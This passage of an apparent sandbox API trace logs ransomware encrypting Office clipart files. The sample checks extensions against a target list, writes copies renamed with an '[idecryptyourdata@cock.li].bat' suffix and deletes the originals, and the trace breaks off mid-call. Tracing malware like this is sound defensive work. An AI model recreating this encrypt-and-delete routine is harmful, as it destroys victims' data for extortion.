[0188.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.175] lstrlenW (lpString=".jpg") returned 4 [0188.175] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.175] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0188.175] lstrlenW (lpString="J0149118.JPG") returned 12 [0188.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0188.176] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=64802) returned 1 [0188.176] CloseHandle (hObject=0x388) returned 1 [0188.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg")) returned 0x220 [0188.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0188.176] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.176] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0188.177] GetLastError () returned 0x0 [0188.177] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xfd22, lpOverlapped=0x0) returned 1 [0188.285] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xfd30, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xfd30, lpOverlapped=0x0) returned 1 [0188.287] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0188.287] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0188.287] SetEndOfFile (hFile=0x360) returned 1 [0188.288] CloseHandle (hObject=0x360) returned 1 [0188.288] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.288] SetEndOfFile (hFile=0x388) returned 1 [0188.289] CloseHandle (hObject=0x388) returned 1 [0188.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0189.522] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg")) returned 1 [0189.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.523] lstrlenW (lpString=".doc") returned 4 [0189.523] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0189.523] lstrlenW (lpString=".docx") returned 5 [0189.523] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0189.523] lstrlenW (lpString=".pdf") returned 4 [0189.523] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0189.523] lstrlenW (lpString=".xls") returned 4 [0189.523] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0189.523] lstrlenW (lpString=".xlsx") returned 5 [0189.523] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0189.523] lstrlenW (lpString=".ppt") returned 4 [0189.523] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0189.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.523] lstrlenW (lpString=".zip") returned 4 [0189.523] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0189.523] lstrlenW (lpString=".rar") returned 4 [0189.523] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0189.523] lstrlenW (lpString=".bz2") returned 4 [0189.523] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0189.523] lstrlenW (lpString=".7z") returned 3 [0189.523] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0189.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.523] lstrlenW (lpString=".dbf") returned 4 [0189.523] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0189.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.524] lstrlenW (lpString=".1cd") returned 4 [0189.524] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0189.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.524] lstrlenW (lpString=".jpg") returned 4 [0189.524] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0189.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.524] lstrlenW (lpString=".doc") returned 4 [0189.524] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0189.524] lstrlenW (lpString=".docx") returned 5 [0189.524] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0189.524] lstrlenW (lpString=".pdf") returned 4 [0189.524] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0189.524] lstrlenW (lpString=".xls") returned 4 [0189.524] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0189.524] lstrlenW (lpString=".xlsx") returned 5 [0189.524] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0189.524] lstrlenW (lpString=".ppt") returned 4 [0189.524] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0189.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.524] lstrlenW (lpString=".zip") returned 4 [0189.524] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0189.524] lstrlenW (lpString=".rar") returned 4 [0189.524] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0189.524] lstrlenW (lpString=".bz2") returned 4 [0189.524] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0189.525] lstrlenW (lpString=".7z") returned 3 [0189.525] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0189.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.525] lstrlenW (lpString=".dbf") returned 4 [0189.525] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0189.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.525] lstrlenW (lpString=".1cd") returned 4 [0189.525] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0189.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 68 [0189.525] lstrlenW (lpString=".jpg") returned 4 [0189.525] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0189.525] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0189.525] lstrlenW (lpString="J0151047.WMF") returned 12 [0189.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0189.526] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=18500) returned 1 [0189.526] CloseHandle (hObject=0x334) returned 1 [0189.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf")) returned 0x220 [0189.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0189.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0189.526] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0189.526] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0189.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0189.527] GetLastError () returned 0x0 [0189.527] ReadFile (in: hFile=0x334, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x4844, lpOverlapped=0x0) returned 1 [0190.526] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x4850, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x4850, lpOverlapped=0x0) returned 1 [0190.738] ReadFile (in: hFile=0x334, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0190.738] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0190.738] SetEndOfFile (hFile=0x380) returned 1 [0190.739] CloseHandle (hObject=0x380) returned 1 [0190.739] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0190.739] SetEndOfFile (hFile=0x334) returned 1 [0190.740] CloseHandle (hObject=0x334) returned 1 [0190.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0190.926] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf")) returned 1 [0190.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.926] lstrlenW (lpString=".doc") returned 4 [0190.926] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0190.926] lstrlenW (lpString=".docx") returned 5 [0190.926] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0190.926] lstrlenW (lpString=".pdf") returned 4 [0190.926] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0190.926] lstrlenW (lpString=".xls") returned 4 [0190.926] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0190.926] lstrlenW (lpString=".xlsx") returned 5 [0190.927] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0190.927] lstrlenW (lpString=".ppt") returned 4 [0190.927] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.927] lstrlenW (lpString=".zip") returned 4 [0190.927] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0190.927] lstrlenW (lpString=".rar") returned 4 [0190.927] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString=".bz2") returned 4 [0190.927] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString=".7z") returned 3 [0190.927] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0190.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.927] lstrlenW (lpString=".dbf") returned 4 [0190.927] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.927] lstrlenW (lpString=".1cd") returned 4 [0190.927] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.927] lstrlenW (lpString=".jpg") returned 4 [0190.927] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.927] lstrlenW (lpString=".doc") returned 4 [0190.927] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0190.927] lstrlenW (lpString=".docx") returned 5 [0190.927] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0190.927] lstrlenW (lpString=".pdf") returned 4 [0190.927] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0190.928] lstrlenW (lpString=".xls") returned 4 [0190.928] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0190.928] lstrlenW (lpString=".xlsx") returned 5 [0190.928] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0190.928] lstrlenW (lpString=".ppt") returned 4 [0190.928] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0190.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.928] lstrlenW (lpString=".zip") returned 4 [0190.928] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0190.928] lstrlenW (lpString=".rar") returned 4 [0190.928] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0190.928] lstrlenW (lpString=".bz2") returned 4 [0190.928] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0190.928] lstrlenW (lpString=".7z") returned 3 [0190.928] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0190.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.928] lstrlenW (lpString=".dbf") returned 4 [0190.928] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0190.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.928] lstrlenW (lpString=".1cd") returned 4 [0190.928] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0190.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 68 [0190.928] lstrlenW (lpString=".jpg") returned 4 [0190.928] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0190.928] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0190.929] lstrlenW (lpString="J0151067.WMF") returned 12 [0190.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0190.929] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=13204) returned 1 [0190.929] CloseHandle (hObject=0x39c) returned 1 [0190.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf")) returned 0x220 [0190.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0190.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0190.930] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0190.930] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0190.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0190.931] GetLastError () returned 0x0 [0190.931] ReadFile (in: hFile=0x39c, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x3394, lpOverlapped=0x0) returned 1 [0191.156] WriteFile (in: hFile=0x3a0, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x33a0, lpOverlapped=0x0) returned 1 [0191.163] ReadFile (in: hFile=0x39c, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0191.163] WriteFile (in: hFile=0x3a0, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0191.163] SetEndOfFile (hFile=0x3a0) returned 1 [0191.164] CloseHandle (hObject=0x3a0) returned 1 [0191.164] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0191.164] SetEndOfFile (hFile=0x39c) returned 1 [0191.164] CloseHandle (hObject=0x39c) returned 1 [0191.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0191.165] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf")) returned 1 [0191.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.165] lstrlenW (lpString=".doc") returned 4 [0191.165] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0191.165] lstrlenW (lpString=".docx") returned 5 [0191.165] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0191.165] lstrlenW (lpString=".pdf") returned 4 [0191.165] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0191.165] lstrlenW (lpString=".xls") returned 4 [0191.165] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0191.165] lstrlenW (lpString=".xlsx") returned 5 [0191.165] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0191.165] lstrlenW (lpString=".ppt") returned 4 [0191.165] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0191.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.165] lstrlenW (lpString=".zip") returned 4 [0191.165] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0191.165] lstrlenW (lpString=".rar") returned 4 [0191.165] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0191.165] lstrlenW (lpString=".bz2") returned 4 [0191.165] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString=".7z") returned 3 [0191.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0191.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.166] lstrlenW (lpString=".dbf") returned 4 [0191.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.166] lstrlenW (lpString=".1cd") returned 4 [0191.166] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.166] lstrlenW (lpString=".jpg") returned 4 [0191.166] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.166] lstrlenW (lpString=".doc") returned 4 [0191.166] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString=".docx") returned 5 [0191.166] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0191.166] lstrlenW (lpString=".pdf") returned 4 [0191.166] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString=".xls") returned 4 [0191.166] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0191.166] lstrlenW (lpString=".xlsx") returned 5 [0191.166] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0191.166] lstrlenW (lpString=".ppt") returned 4 [0191.166] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0191.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.166] lstrlenW (lpString=".zip") returned 4 [0191.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0191.166] lstrlenW (lpString=".rar") returned 4 [0191.167] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0191.167] lstrlenW (lpString=".bz2") returned 4 [0191.167] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0191.167] lstrlenW (lpString=".7z") returned 3 [0191.167] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0191.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.167] lstrlenW (lpString=".dbf") returned 4 [0191.167] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0191.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.167] lstrlenW (lpString=".1cd") returned 4 [0191.167] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0191.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF") returned 68 [0191.167] lstrlenW (lpString=".jpg") returned 4 [0191.167] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0191.167] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0191.167] lstrlenW (lpString="J0152430.WMF") returned 12 [0191.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 